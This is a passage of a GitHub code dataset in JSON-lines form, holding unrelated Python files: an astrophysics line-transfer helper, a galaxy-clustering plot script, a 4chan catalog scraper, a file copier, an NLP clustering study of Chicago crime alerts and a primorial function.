/ H2\n Returned values = photons / s / channel / H2\n Input:\n filename = name of the dust emission file written by CRT\n cells = number of cells in the model\n transitions = number of transitions \n width = channel width [km/s]\n mol = molecule object\n Return:\n dust emission [cells, transitions] in units photons / s / channel / H2\n Note:\n the caller will do scaling with density so that the final array should be in \n units photons / s / channel / cm3\n \"\"\"\n fp = open(filename, 'rb')\n a, b = fromfile(fp, int32, 2)\n if ((a!=cells)|(b!=transitions)):\n print(\"*** Error in ReadDustEmission: (CELLS,TRANSITIONS)=(%d,%d), file has (%d,%d)\" % (cells,transitions,a,b))\n sys.exit()\n emi = fromfile(fp, float32).reshape(cells, transitions)\n fp.close()\n for t in range(transitions):\n emi[:,t] *= mol.F[t] * (1.0e5*width/C_LIGHT) # converted to photons / s / channel / H2\n return asarray(emi, float32)\n \n\n\ndef ReadOverlap(filename, mol, width, transitions, channels):\n \"\"\"\n Read file describing overlapping transitions:\n # components\n { upper lower}\n \"\"\"\n lines = open(filename, 'r').readlines()\n OLBAND = OLBandO()\n OLBAND.Init(width)\n iline = 0\n while(iline0, use GPU instead of CPU\n platforms = potential OpenCL platforms to use, default [0,1,2,3,4]\n angle_as = model cloud radius in arcsec; if the parameter is not specified\n or the value is negative, try to read pickled INI information from \n the provided spectrum file and read the angle from there\n samples = optional, number of samples per one dimension (default 201)\n \"\"\"\n fp = open(filename, 'rb')\n NSPE, NCHN = fromfile(fp, int32, 2)\n V0, DV = fromfile(fp, float32, 2)\n SPE = fromfile(fp, float32, NSPE*NCHN).reshape(NSPE, NCHN)\n INI = None\n if (angle_as<0.0): # angle not given as parameter, read pickled data from the spectrum file\n try:\n INI = pickle.load(fp)\n fp.close()\n fwhm = (fwhm_as/INI['angle']) * (NSPE-1.0) # fwhm, in units where [0, NSPE-1] is the cloud radius\n except:\n print(\"*** ConvolveSpectra1D fails: angle_as not given as argument and not found in the spectrum file\")\n sys.exit(0)\n else:\n fwhm = (fwhm_as/angle_as) * (NSPE-1.0) # fwhm [number of offset steps]\n ###\n platform, device, context, queue, mf = InitCL(GPU, platforms)\n SPE_buf = cl.Buffer(context, mf.READ_ONLY, 4*NSPE*NCHN)\n CON_buf = cl.Buffer(context, mf.READ_WRITE, 4*NSPE*NCHN)\n INSTALL_DIR = os.path.dirname(os.path.realpath(__file__)) \n source = open(INSTALL_DIR+\"/kernel_convolve_spectra_1d.c\").read()\n program = cl.Program(context, source).build()\n kernel_con = program.Convolve\n kernel_con.set_scalar_arg_dtypes([np.int32, np.int32, np.int32, np.float32, None, None])\n LOCAL = [ 1, 32 ][GPU>0]\n GLOBAL = (NSPE//LOCAL+1)*LOCAL\n cl.enqueue_copy(queue, SPE_buf, SPE)\n kernel_con(queue, [GLOBAL,], [LOCAL,], NSPE, NCHN, int(samples)//2, fwhm, SPE_buf, CON_buf)\n cl.enqueue_copy(queue, SPE, CON_buf)\n ###\n ofilename = filename.replace('.spe','')+'_convolved.spe'\n fp = open(ofilename, 'wb')\n asarray([NSPE, NCHN], int32).tofile(fp)\n asarray([V0, DV],float32).tofile(fp)\n asarray(SPE, float32).tofile(fp)\n if (INI!=None):\n pickle.dump(INI, fp)\n fp.close()\n return V0+arange(NCHN)*DV, SPE\n\n\n\ndef MakeEmptyFitsDim(lon, lat, pix, m, n, dv=0.0, nchn=0, sys_req='fk5'):\n \"\"\"\n Make an empty fits object.\n Inputs:\n lon, lat = centre coordinates of the field [degrees]\n pix = pixel size [degrees]\n m, n = width and height in pixels\n sys_req = coordinate system, 'fk5' or 'galactic'\n \"\"\"\n import astropy.io.fits as pyfits\n A = zeros((n, m), float32)\n hdu = pyfits.PrimaryHDU(A)\n F = pyfits.HDUList([hdu])\n F[0].header.update(CRVAL1 = lon)\n F[0].header.update(CRVAL2 = lat)\n F[0].header.update(CDELT1 = -pix)\n F[0].header.update(CDELT2 = pix)\n F[0].header.update(CRPIX1 = 0.5*(m+1)+0.5)\n F[0].header.update(CRPIX2 = 0.5*(n+1)+0.5)\n if (sys_req=='galactic'):\n F[0].header.update(CTYPE1 = 'GLON-TAN')\n F[0].header.update(CTYPE2 = 'GLAT-TAN')\n F[0].header.update(COORDSYS = 'GALACTIC')\n else:\n F[0].header.update(CTYPE1 = 'RA---TAN')\n F[0].header.update(CTYPE2 = 'DEC--TAN')\n F[0].header.update(COORDSYS = 'EQUATORIAL')\n F[0].header.update(EQUINOX = 2000.0)\n if (nchn>0):\n F[0].data = zeros((nchn, n, m), float32)\n F[0].header['NAXIS' ] = 3\n F[0].header['NAXIS3'] = nchn\n F[0].header['CRPIX3'] = 0.5*(nchn+1.0)\n F[0].header['CRVAL3'] = 0.0\n F[0].header['CDELT3'] = dv\n F[0].header['CTYPE3'] = 'velocity'\n else:\n F[0].data = zeros((n, m), float32)\n F.verify('fix')\n return F\n\n","repo_name":"mjuvela/LOC","sub_path":"LOC_aux.py","file_name":"LOC_aux.py","file_ext":"py","file_size_in_byte":76240,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"12386173237","text":"import matplotlib \nmatplotlib.use('agg') \nimport time\nimport matplotlib.pyplot as plt \nimport numpy as np \nfrom astropy.table import Table\nimport astropy.io.fits as fits\nimport matplotlib.gridspec as gridspec \nimport sys\n\n\nrpmin = 0.1\nrpmax = 50\npimax = 80\nhome = '/global/cscratch1/sd/jiaxi/master/'\nfor gal,ver in zip(['LRG','ELG'],['v7_2','v7']):\n for i,GC in enumerate(['NGC','SGC']):\n # ELG wp from Faizan\n obs = Table.read('{}catalog/nersc_wp_{}_{}/wp_rp_pip_eBOSS_{}_{}_{}.dat'.format(home,gal,ver,gal,GC,ver),format='ascii.no_header')\n obs = obs[(obs['col3']>=rpmin)&(obs['col3']0:\n return urls\n else:\n return None\n\ndef handle_com(com):\n \"\"\"Ugly function to remove all the html tags from the comment\n\n Args:\n com (str): comment\n\n Returns:\n str: stripped from html tags comment\n \"\"\"\n com = re.sub('

', '\\n', com)\n com = re.sub('
', '\\n', com)\n com = re.sub('>', '>', com)\n com = re.sub('', '\\n', com)\n com = re.sub('', '', com)\n com = re.sub(''', \"'\", com)\n com = re.sub('"', '\"', com)\n com = re.sub(r'', '[REPLY]', com)\n return com\n\n\ndef cycle_collector(board_name):\n \"\"\"Function that takes snapshot of the board and logs data in dataframe\n\n Args:\n board_name (str): board to log\n \"\"\"\n\n #create a request\n r = requests.get(board_name)\n #r = requests.get('https://a.4cdn.org/tv/catalog.json')\n r = r.json()\n\n #getting a date\n now = dt.now()\n\n #UGLY SUBJECT TO CHANGE\n date = str(now.year)+'-'+str(now.month)+'-'+str(now.day)+'_'+str(now.hour)+'-'+str(now.minute)\n\n #open and save threads into the csv file\n with open('dataset/pol_'+date+'.csv', mode='w') as csv_file:\n #with open('dataset/tv_'+date+'.csv', mode='w') as csv_file:\n\n #create field names\n fieldnames = ['thread_num', 'post_time', 'id', 'country', 'com', 'filename', 'url']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writeheader()\n\n #for each thread on the board\n for threads in gen_chan():\n\n #thread\n no = get_threads('no')\n #now\n now = get_threads('now')\n #post time\n time = get_threads('time')\n #my time\n my_time = dt.today()\n #post text\n com = handle_com(get_threads('com'))\n #post name\n name = get_threads('name')\n #tripcode\n trip = get_threads('trip')\n #id\n ids = get_threads('id')\n #capcode?\n capcode = get_threads('capcode')\n #filename\n filename = get_threads('filename')\n #resto\n rest = get_threads('resto')\n #semantic_url\n semantic_url = get_threads('semantic_url')\n #replies\n replies = get_threads('replies')\n #images\n images = get_threads('images')\n #url - need to remake this one probably\n url = find_urls(com)\n #country\n country = get_threads('country_name')\n\n writer.writerow({'thread_num': no,\n 'post_time': time,\n 'id': ids,\n 'country': country,\n 'com': com,\n 'filename': filename,\n 'url': url})\n\n #write all thread replies\n if 'last_replies' in threads:\n for comment in threads['last_replies']:\n\n #comment\n com = handle_com(comment.get('com', 'NaN'))\n #poster id\n ids = comment.get('id', 'NaN')\n #poster country\n country = comment.get('country_name', 'NaN')\n #post time\n time = comment.get('time', 'NaN')\n #filename\n filename_com = comment.get('filename', 'NaN') + comment.get('ext', 'NaN')\n #urls if present\n url = find_urls(com)\n\n writer.writerow({'thread_num': no,\n 'post_time': time,\n 'id': ids,\n 'country': country,\n 'com': com,\n 'filename': filename,\n 'url': url})\n\n print(\"Done saving \", date)\n\ndef main():\n \"\"\"Main function that runs a logging loop\n \"\"\"\n board_name = 'https://a.4cdn.org/pol/catalog.json'\n\n while True:\n cycle_collector(board_name)\n time.sleep(300)\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"AlexEgiazarov/ChanGuard","sub_path":"dataCollector.py","file_name":"dataCollector.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11264306049","text":"READ_FROM = r\"C:\\Users\\User\\Desktop\\python cyber\\copying machine\\f.txt\"\nWRITE_TO = r\"C:\\Users\\User\\Desktop\\python cyber\\copying machine\\e.txt\"\n\n\ndef main():\n copy_file_to(READ_FROM, WRITE_TO)\n print_file(WRITE_TO)\n\n\ndef copy_file_to(copy_from, copy_to):\n with open(copy_from, \"r\") as read_from:\n with open(copy_to, \"w\") as write_to:\n for line in read_from:\n write_to.write(line, )\n\n\ndef print_file(file):\n with open(file, \"r\") as file:\n for line in file:\n print(line, )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OhadSG/Python","sub_path":"copying machine/Copying Machine.py","file_name":"Copying Machine.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35259579328","text":"#----------------------------------------------------------------------------\n# IMPORTS \n#----------------------------------------------------------------------------\n\nimport nltk\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('averaged_perceptron_tagger')\n\nimport re\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom nltk import FreqDist\nfrom sklearn.cluster import KMeans\nfrom nltk.corpus import stopwords, wordnet\nfrom nltk.corpus.reader.plaintext import PlaintextCorpusReader\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer, TreebankWordTokenizer\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.manifold import MDS, TSNE\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom gensim import corpora\nfrom gensim.models import Word2Vec,LdaMulticore, TfidfModel\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\n\nfrom gensim.models.fasttext import FastText\nfrom sklearn.decomposition import PCA\n\n#----------------------------------------------------------------------------\n# GLOBALS\n#----------------------------------------------------------------------------\n\n#set working Directory to where class corpus is saved.\nprocessed_dir = '/Users/anton/Northwestern/MSDS453/chicago/'\nos.chdir(processed_dir)\n\nK = 11\nRANDOM_STATE = 42\nCORPUS_DIR = 'corpus/'\nCLEAN_CSV = 'outfiles/processed.csv'\nLDA_NUM_TOPICS = 11\nCLUSTER_KEYWORDS = 10\nMIN_DF=0.05\n\n#----------------------------------------------------------------------------\n# FUNCTIONS \n#----------------------------------------------------------------------------\n\ndef corpus_info(corpus):\n\n fids = len(corpus.fileids())\n paras = len(corpus.paras())\n sents = len(corpus.sents())\n sperp = sum(len(para) for para in corpus.paras()) / float(paras)\n tokens = FreqDist(corpus.words())\n count = sum(tokens.values())\n vocab = len(tokens)\n lexdiv = float(count) / float(vocab)\n\n print((\n \"\\n[+] Text corpus contains {} files composed of:\\n\"\n \" > {} paragraphs and {} sentences\\n\"\n \" > {:0.3f} sentences per paragraph\\n\"\n \" > word count of {} with a vocabulary of {}\\n\"\n \" > lexical diversity is {:0.3f}\"\n ).format(\n fids, paras, sents, sperp, count, vocab, lexdiv\n ))\n\ndef clean_to_csv(data):\n df = pd.DataFrame(data)\n df.to_csv(CLEAN_CSV, index=False)\n \ndef get_wordnet_pos(word):\n \"\"\"Map POS tag to first character lemmatize() accepts\"\"\"\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ,\n \"N\": wordnet.NOUN,\n \"V\": wordnet.VERB,\n \"R\": wordnet.ADV}\n\n return tag_dict.get(tag, wordnet.NOUN)\n\ndef clean_data(corpus):\n safe_words = ['armed', 'hit', 'run', 'gun']\n\n bad_words = ['january', 'february', 'march', 'april', 'may', 'june', 'july', \n 'august', 'september', 'october', 'november', 'december', 'block', \n 'north', 'south', 'east', 'west', 'monday', 'tuesday', 'wednesday', \n 'thursday', 'friday', 'approximately', 'detective', 'chicago',\n 'investigation', 'unit', 'occur', 'month', 'incident', 'list', 'alert',\n 'general', 'geographical', 'location']\n\n # Initialize empty list to hold values\n titles = []\n processed_strings = []\n processed_save = []\n processed_words = []\n \n # For each file in the directory, clean, parse and save to lists\n for infile in sorted(corpus.fileids()):\n cleaned = {}\n raw_text = corpus.raw(infile)\n \n # Tokenize using TreebankWordTokenizer\n tokenizer = TreebankWordTokenizer()\n tokens = tokenizer.tokenize(raw_text)\n \n # remove punctuation from each word\n re_punc = re.compile('[^A-Za-z0-9]+')\n tokens = [re_punc.sub(' ', token) for token in tokens]\n \n # Convert text to lower-alpha - should already be done\n tokens=[token.lower().strip() for token in tokens if token.isalpha()]\n \n # Strip stop words\n stop_words = set(stopwords.words('english'))\n tokens = [token for token in tokens if not token in stop_words]\n \n # strip words with size <= 3, do not include safe_words\n tokens = [token for token in tokens if len(token) > 3 or token in safe_words]\n \n # Lemmatize robot, robotic, robotics, robots\n lemmatizer = WordNetLemmatizer()\n tokens = [lemmatizer.lemmatize(token, get_wordnet_pos(token)) for token in tokens]\n \n # Remove bad words post lemmatize\n tokens = [token for token in tokens if token not in bad_words]\n\n # Append tokens to token list\n processed_words.append(tokens)\n \n # Rebuild the tokens into a single string\n single = TreebankWordDetokenizer().detokenize(tokens)\n processed_strings.append(single)\n \n # Append the title and clean data to a list - for saving to csv\n absolute_path = os.path.abspath(infile)\n path = os.path.dirname(absolute_path)\n category = os.path.basename(path)\n\n cleaned['titles'] = infile\n cleaned['data'] = single\n cleaned['category'] = category\n \n processed_save.append(cleaned)\n \n # Save the titles\n titles.append(infile)\n \n # Save to csv for later processing\n clean_to_csv(processed_save)\n \n # Return lists\n return processed_strings, processed_words, titles\n\ndef create_ec(dictionary, corpus):\n for key, values in dictionary.items():\n for value in values:\n corpus= corpus.replace(value, key)\n return corpus\n\n\n#----------------------------------------------------------------------------\n# GET DATA \n#----------------------------------------------------------------------------\n\n# Generate corpus from all text files and get info on the corpus\nraw_corpus = PlaintextCorpusReader(CORPUS_DIR, '.*\\.txt')\ncorpus_info(raw_corpus)\n\n# Clean the data\nprocessed_strings, processed_words, titles = clean_data(raw_corpus)\n\n# Create equivalence classes - work in progress\nec ={'arson': ['molotov', 'incendiary', 'flame', 'ignited'], \n 'homicide': ['murder', 'shot'], 'residential': ['garage', 'apartment'],\n 'gun': ['handgun', 'weapon'], 'vehicle': ['automobile', 'auto'], \n 'child': ['juvenile'], 'assault': ['abuse'], 'abduct': ['lure']}\n\n# Apply the ECs\nnew_processed = list()\nfor i in processed_strings:\n new_processed.append(create_ec(ec, i))\n\nprocessed_strings = new_processed\n\n#----------------------------------------------------------------------------\n# SKLEARN TFIDF \n#----------------------------------------------------------------------------\n\n# Call Tfidf Vectorizer - range 3 \nTfidf=TfidfVectorizer(ngram_range=(1,3), max_df=0.95, min_df=MIN_DF)\n\n# Fit the vectorizer using final processed documents.\nTFIDF_matrix=Tfidf.fit_transform(processed_strings) \n\n# Creating datafram from TFIDF Matrix\nmatrix=pd.DataFrame(TFIDF_matrix.toarray(), columns=Tfidf.get_feature_names(), index=titles)\n\n#print('\\n[+] Word Frequency across documents: N-Grams -> N=3')\n#print(' > ', Tfidf.get_feature_names())\n\naverage_TFIDF={}\nfor i in matrix.columns:\n average_TFIDF[i]=np.mean(matrix[i])\n\naverage_TFIDF_DF=pd.DataFrame(average_TFIDF,index=[0]).transpose()\n\naverage_TFIDF_DF.columns=['TFIDF']\n\n#calculate Q1 and Q3 range\nQ1=np.percentile(average_TFIDF_DF, 25)\nQ3=np.percentile(average_TFIDF_DF, 75)\nIQR = Q3 - Q1\noutlier=Q3+(1.5*IQR)\n\n# words that exceed the Q3+IQR*1.5\noutlier_list=average_TFIDF_DF[average_TFIDF_DF['TFIDF']>=outlier]\nkeep_list=average_TFIDF_DF[average_TFIDF_DF['TFIDF'] {}'.format(feature_names[sorted_by_idf[:8]]))\nprint('\\n[+] Features with highest idf:\\n > {}'.format(feature_names[sorted_by_idf[-8:]]))\n\n# TF-IDF - Maximum token value throughout the whole dataset\n#new1 = tf.transform(processed_strings)\n\n# find maximum value for each of the features over all of dataset:\nmax_val = TFIDF_matrix.max(axis=0).toarray().ravel()\n\n#sort weights from smallest to biggest and extract their indices \nsort_by_tfidf = max_val.argsort()\nprint('\\n[+] Features with lowest tfidf:\\n > {}'.format(feature_names[sort_by_tfidf[:8]]))\nprint('\\n[+] Features with highest tfidf: \\n > {}'.format(feature_names[sort_by_tfidf[-8:]]))\n\n#from sklearn.naive_bayes import MultinomialNB\n#clf = MultinomialNB().fit(X, Y)\n#print(clf.predict(count_vect.transform([\"\"])))\n\n#----------------------------------------------------------------------------\n# DOC2VEC \n#----------------------------------------------------------------------------\n\n# Initialize and train model\ndocuments = [TaggedDocument(doc, [i]) for i, doc in enumerate(processed_strings)]\nmodel = Doc2Vec(documents, vector_size=5, window=2, min_count=1, workers=4)\n\n# Infer vector to dataframe\ndoc2vec_df=pd.DataFrame()\nfor i in range(0,len(processed_words)):\n vector=pd.DataFrame(model.infer_vector(processed_words[i])).transpose()\n doc2vec_df=pd.concat([doc2vec_df,vector], axis=0)\n\ndoc2vec_df=doc2vec_df.reset_index()\n\ndoc_titles={'title': titles}\nt=pd.DataFrame(doc_titles)\n\ndoc2vec_df=pd.concat([doc2vec_df,t], axis=1)\n\ndoc2vec_df=doc2vec_df.drop('index', axis=1)\n\n#----------------------------------------------------------------------------\n# WORD2VEC \n#----------------------------------------------------------------------------\n\n#Note, there are opportunities to use the word2vec matrix to determine words \n#which are similar. Similar words can be used to create equivalent classes. \n#k-means is not used to group individual words using the Word2Vec output.\n\n# word to vec\nmodel_w2v = Word2Vec(processed_words, size=100, window=5, min_count=0.75, workers=4)\n\n# join all processed DSI words into single list\nprocessed_text_w2v=[]\nfor i in processed_words:\n for k in i:\n processed_text_w2v.append(k)\n\n# obtian all the unique words from DSI\nw2v_words=list(set(processed_text_w2v))\n\n#can also use the get_feature_names() from TFIDF to get the list of words\n#w2v_words=Tfidf.get_feature_names()\n\n# empty dictionary to store words with vectors\nw2v_vectors={}\n\n# for loop to obtain weights for each word\nfor i in w2v_words:\n temp_vec=model_w2v.wv[i]\n w2v_vectors[i]=temp_vec\n\n# create a final dataframe to view word vectors\nw2v_df=pd.DataFrame(w2v_vectors).transpose()\n\n# Extract vectors and words for visualizaing\nvecs = w2v_df.as_matrix(columns=w2v_df.columns[1:])\nunique_words = w2v_df.index\n\n# Reduce the number of components and visualize\ntsne = TSNE(n_components=2, random_state=0, n_iter=5000, perplexity=3)\nnp.set_printoptions(suppress=True)\nT = tsne.fit_transform(vecs)\nlabels = unique_words\n\nplt.figure(figsize=(20, 20))\nplt.scatter(T[:, 0], T[:, 1], c='orange', edgecolors='r')\nfor label, x, y in zip(labels, T[:, 0], T[:, 1]):\n plt.annotate(label, xy=(x+1, y+1), xytext=(0, 0), textcoords='offset points')\n\n#----------------------------------------------------------------------------\n# K-MEANS CLUSTERING w/TFIDF \n#----------------------------------------------------------------------------\n\n# Initialize and fit\nkm = KMeans(n_clusters=K, random_state=RANDOM_STATE)\nkm.fit(TFIDF_matrix)\nclusters = list(km.labels_)\n\nterms = Tfidf.get_feature_names()\nDictionary={'Doc Name': titles, 'Cluster': clusters, 'Text': processed_strings}\nframe=pd.DataFrame(Dictionary, columns=['Cluster', 'Doc Name', 'Text'])\n\nprint(\"\\n[+] Top terms per cluster:\")\n\n#sort cluster centers by proximity to centroid\norder_centroids = km.cluster_centers_.argsort()[:, ::-1] \n\nterms_dict=[]\n\n#save the terms for each cluster and document to dictionaries. To be used later\n#for plotting output.\n\n#dictionary to store terms and titles\ncluster_terms={}\ncluster_title={}\n\nfor i in range(K):\n print(\"\\nCluster %d:\" % i),\n temp_terms=[]\n temp_titles=[]\n for ind in order_centroids[i, :CLUSTER_KEYWORDS]:\n print(' > %s' % terms[ind])\n terms_dict.append(terms[ind])\n temp_terms.append(terms[ind])\n cluster_terms[i]=temp_terms\n \n print(\"\\nCluster %d titles:\" % i, end='\\n')\n temp=frame[frame['Cluster']==i]\n for title in temp['Doc Name']:\n print(' > %s' % title, end='\\n')\n temp_titles.append(title)\n cluster_title[i]=temp_titles\n\n#----------------------------------------------------------------------------\n# PLOTTING - TFIDF\n#----------------------------------------------------------------------------\n\n# convert two components as we're plotting points in a two-dimensional plane\n# \"precomputed\" because we provide a distance matrix\n# we will also specify `random_state` so the plot is reproducible.\nmds = MDS(n_components=2, dissimilarity=\"precomputed\", random_state=RANDOM_STATE)\n\ndist = 1 - cosine_similarity(TFIDF_matrix)\n\npos = mds.fit_transform(dist) # shape (n_components, n_samples)\n\nxs, ys = pos[:, 0], pos[:, 1]\n\n#set up cluster names using a dict. \ncluster_dict=cluster_title\n\n#create data frame that has the result of the MDS plus the cluster numbers and titles\ndf = pd.DataFrame(dict(x=xs, y=ys, label=clusters, title=range(0,len(clusters)))) \n\n#group by cluster\ngroups = df.groupby('label')\n\nfig, ax = plt.subplots(figsize=(12, 12)) # set size\nax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\n#iterate through groups to layer the plot\n#note that I use the cluster_name and cluster_color dicts with the 'name' lookup to return the appropriate color/label\nfor name, group in groups:\n ax.plot(group.x, group.y, marker='o', linestyle='', ms=10,\n label=cluster_dict[name], mec='none') \n ax.set_aspect('auto')\n ax.title.set_text('TFIDF')\n ax.tick_params(\\\n axis= 'x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=True)\n ax.tick_params(\\\n axis= 'y', # changes apply to the y-axis\n which='both', # both major and minor ticks are affected\n left=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelleft=True)\n\n \nax.legend(title='Legend', loc='center left', bbox_to_anchor=(1, 0.5)) #show legend with only 1 point\n\n#The following section of code is to run the k-means algorithm on the doc2vec outputs.\n#note the differences in document clusters compared to the TFIDF matrix.\n#----------------------------------------------------------------------------\n# K-MEANS CLUSTERING w/DOC2VEX\n#----------------------------------------------------------------------------\n\ndoc2vec_k_means=doc2vec_df.drop('title', axis=1)\n\nkm = KMeans(n_clusters=K, random_state=RANDOM_STATE)\nkm.fit(doc2vec_k_means)\nclusters_d2v = km.labels_.tolist()\n\nDictionary={'Doc Name':titles, 'Cluster':clusters_d2v, 'Text': processed_strings}\nframe=pd.DataFrame(Dictionary, columns=['Cluster', 'Doc Name', 'Text'])\n\n#dictionary to store clusters and respective titles\ncluster_title={}\n\n#note doc2vec clusters will not have individual words due to the vector representation\n#is based on the entire document not indvidual words. As a result, there won't be individual\n#word outputs from each cluster. \nfor i in range(K):\n temp=frame[frame['Cluster']==i]\n temp_title_list=[]\n for title in temp['Doc Name']:\n temp_title_list.append(title)\n cluster_title[i]=temp_title_list\n\n#----------------------------------------------------------------------------\n# PLOTTING - DOC2VEC\n#----------------------------------------------------------------------------\n\nmds = MDS(n_components=2, dissimilarity=\"precomputed\", random_state=RANDOM_STATE)\n\ndist = 1 - cosine_similarity(doc2vec_k_means)\n\npos = mds.fit_transform(dist) # shape (n_components, n_samples)\n\nxs, ys = pos[:, 0], pos[:, 1]\n\n#set up cluster names using a dict. \ncluster_dict=cluster_title \n\n#create data frame that has the result of the MDS plus the cluster numbers and titles\ndf = pd.DataFrame(dict(x=xs, y=ys, label=clusters, title=range(0,len(clusters)))) \n\n#group by cluster\ngroups = df.groupby('label')\n\nfig, ax = plt.subplots(figsize=(12, 12)) # set size\nax.margins(0.05) # Optional, just adds 5% padding to the autoscaling\n\n#iterate through groups to layer the plot\n#note that I use the cluster_name and cluster_color dicts with the 'name' lookup to return the appropriate color/label\nfor name, group in groups:\n ax.plot(group.x, group.y, marker='o', linestyle='', ms=12,\n label=cluster_dict[name], mec='none')\n ax.set_aspect('auto')\n ax.title.set_text('K-MEANS')\n ax.tick_params(\\\n axis= 'x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n bottom=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelbottom=True)\n ax.tick_params(\\\n axis= 'y', # changes apply to the y-axis\n which='both', # both major and minor ticks are affected\n left=False, # ticks along the bottom edge are off\n top=False, # ticks along the top edge are off\n labelleft=True)\n\nax.legend(title='Clusters', loc='center left', bbox_to_anchor=(1, 0.5)) #show legend with only 1 point\n\n#The following section is used to create a model to predict the clusters labels \n#based on the the TFIDF matrix and the doc2vec vectors. Note the model performance \n#using the two different vectorization methods.\n#----------------------------------------------------------------------------\n# CLASSIFICATION - VARIOUS METHODS\n#----------------------------------------------------------------------------\n\n# Instantiate RF \nmodel_RF=RandomForestClassifier()\n\n# TFIDF\nY=clusters\nX=TFIDF_matrix\n\n# cross validation\ncv_score=cross_val_score(model_RF, X, Y)\n\n#mean CV score\nnp.mean(cv_score)\n\nprint('\\n[+] Performance: ')\nprint(' > Random Forest mean_cv_score: {}'.format(round(np.mean(cv_score), 4)))\n\n\n\n#Doc2Vec\nY=clusters_d2v\nX=doc2vec_k_means\n\n#cross validation\ncv_score=cross_val_score(model_RF, X, Y)\n\n#mean CV score\nnp.mean(cv_score)\n\nprint(' > Doc2Vec mean_cv_score: {}'.format(round(np.mean(cv_score), 4)))\n\n#----------------------------------------------------------------------------\n# LDA \n#----------------------------------------------------------------------------\n\n#LDA using bag of words\ndictionary = corpora.Dictionary(processed_words)\ncorpus = [dictionary.doc2bow(doc) for doc in processed_words]\n\nldamodel = LdaMulticore(corpus, num_topics=LDA_NUM_TOPICS, id2word=dictionary, passes=2, workers=2) \n\nprint('\\n[+] LDA Bag of Words')\nfor idx, topic in ldamodel.print_topics(-1):\n print(' > Topic: {}'.format(idx))\n print(' > Words: {}'.format(topic))\n\nprint('\\n[+] LDA TFIDF')\ntfidf = TfidfModel(corpus)\ncorpus_tfidf = tfidf[corpus]\nldamodel = LdaMulticore(corpus_tfidf, num_topics=LDA_NUM_TOPICS, id2word=dictionary, passes=2, workers=2) \n\nfor idx, topic in ldamodel.print_topics(-1):\n print(' > Topic: {}'.format(idx))\n print(' > Words: {}'.format(topic))\n\n\n\n#the following section is example code to create ECs within the corpus. A dictionary\n#will need to be created for every EC. Each EC will need to be applied to the corpus.\n#Below is an example of how the function works.\n#----------------------------------------------------------------------------\n# SVD\n#----------------------------------------------------------------------------\n\n# raw documents to tf-idf matrix: \n#vectorizer = TfidfVectorizer(stop_words='english', \n# use_idf=True, \n# smooth_idf=True)\n# SVD to reduce dimensionality: \n#svd_model = TruncatedSVD(n_components=100, algorithm='randomized', n_iter=10)\n\n# pipeline of tf-idf + SVD, fit to and applied to documents:\n#svd_transformer = Pipeline([('tfidf', vectorizer), ('svd', svd_model)])\n#svd_matrix = svd_transformer.fit_transform(processed_strings)\n\n# Set values for various parameters. Tune as needed\nfeature_size = 100 # Word vector dimensionality \nwindow_context = 10 # Context window size \nmin_word_count = 1 # Minimum word count \nsample = 1e-3 # Downsample setting for frequent words\n\n# sg decides whether to use the skip-gram model (1) or CBOW (0)\nft_model = FastText(processed_words, size=feature_size, window=window_context, \n min_count=min_word_count,sample=sample, sg=1, iter=50)\n \n# view similar words based on gensim's FastText model\nsimilar_words = {search_term: [item[0] for item in ft_model.wv.most_similar([search_term], topn=5)]\n for search_term in ['handgun', 'arson', 'homicide', 'armed', 'gun', 'murder', 'fire', 'shot', 'robbery', 'theft', 'burglary', 'sexual', 'kidnap']}\n\nprint('\\n[+] Word similarities:')\nprint(similar_words)\n\n# use Principal Component Analysis (PCA) to reduce the word embedding \n# dimensions to 2-D and then visualize the same\nwords = sum([[k] + v for k, v in similar_words.items()], [])\nwvs = ft_model.wv[words]\n\npca = PCA(n_components=2)\nnp.set_printoptions(suppress=True)\nP = pca.fit_transform(wvs)\nlabels = words\n\nplt.figure(figsize=(12, 10))\nplt.scatter(P[:, 0], P[:, 1], c='lightgreen', edgecolors='g')\nfor label, x, y in zip(labels, P[:, 0], P[:, 1]):\n plt.annotate(label, xy=(x+0.06, y+0.03), xytext=(0, 0), textcoords='offset points')\n\n","repo_name":"af001/Data-Science-Portfolio","sub_path":"MSDS453/nlp_topic_cluster_analysis.py","file_name":"nlp_topic_cluster_analysis.py","file_ext":"py","file_size_in_byte":22382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"20410488873","text":"def num_primorial(n):\n count, mul, i = 0, 1, 2\n\n while count != n:\n if isprime(i):\n mul *= i\n count += 1\n i += 1\n\n return mul\n\ndef isprime(n):\n\n if n<2:\n return False\n\n for i in range(2, int(n**0.5)+1):\n if n % i == 0:\n return False\n \n return True\n\nprint(num_primorial(5))","repo_name":"namujinju/study-note","sub_path":"algorithm-study/codewars/num_primorial.py","file_name":"num_primorial.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39170941709","text":"import operator\n\nsum = 0\nwith open('input') as f:\n lines = [ x.strip() for x in f.readlines()]\nfor line 